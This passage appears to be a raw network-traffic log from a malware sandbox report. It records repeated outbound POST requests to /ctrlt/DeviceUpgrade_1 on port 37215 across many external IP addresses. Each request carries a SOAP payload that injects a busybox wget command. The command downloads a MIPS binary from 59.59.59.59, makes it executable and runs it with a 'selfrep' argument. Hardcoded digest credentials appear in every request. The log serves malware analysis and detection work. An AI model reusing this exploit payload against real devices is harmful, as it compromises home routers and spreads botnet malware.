2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          228192.168.2.1550334157.39.150.18037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.557430983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          229192.168.2.1546236109.111.139.10237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.557441950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          230192.168.2.1559608197.49.223.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.558018923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          231192.168.2.154282841.40.47.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563291073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          232192.168.2.153308041.195.64.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563291073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          233192.168.2.1560700157.246.143.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563292980 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          234192.168.2.1556054157.0.128.13237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563316107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          235192.168.2.1549124157.182.240.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563348055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          236192.168.2.1536988156.106.37.17937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563357115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          237192.168.2.1539458157.127.210.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563369036 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          238192.168.2.153944641.43.171.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563369036 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
